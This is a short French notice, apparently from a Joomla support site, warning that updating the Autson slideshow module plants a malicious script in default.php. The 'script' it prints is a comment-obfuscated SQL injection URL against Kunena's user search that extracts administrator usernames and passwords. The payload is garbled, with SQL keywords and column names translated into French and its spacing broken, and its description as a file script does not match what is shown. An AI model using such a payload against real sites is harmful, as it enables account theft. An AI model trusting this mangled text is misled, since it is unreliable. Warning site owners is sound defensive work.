Autson Slide Show : script à retirer - Module CMS Joomla
Script malin inséré dans le module Autson slide
Jeudi 9 octobre 2014 - Assistance Joomla - Attention, lors de vos mises à jours de ce module un script vicieux, s'insère à votre insu dans le fichier default.php de ce module.
Attention si votre site comporte le gestionnaire de slides show Autson, vous allez être infecté lors de la mise à jour de votre module..
Voici le script malin qu'il faudra retirer de default.php
/index.php?option=com_kunena&func= userlist & search =% 25 '/ ** // *! eT * // ** / 1 = 2) / ** // *! Union * // ** // *! SELECT * // ** / 1, / *! concat (0x3b3b3b, nom d'utilisateur, 0x3e3e3e, mot de passe, 0x7c7c7 c, type d'utilisateur) * /, / *! concat (0x3b3b3b, nom d'utilisateur, 0x3e3e3e, mot de passe, 0x7c7c7c, type d'utilisateur) * /, 4,5,6,7,8,9,10,11,12,13,14,15 / ** // *! Du * // ** / j os_users / ** // *! Où * // ** / usertype = 0x53757065722041646d696e6973747261746f72 / ** / / *! Ou * / usertype = 0x41646d696e6973747261746f72% 20-- 20%;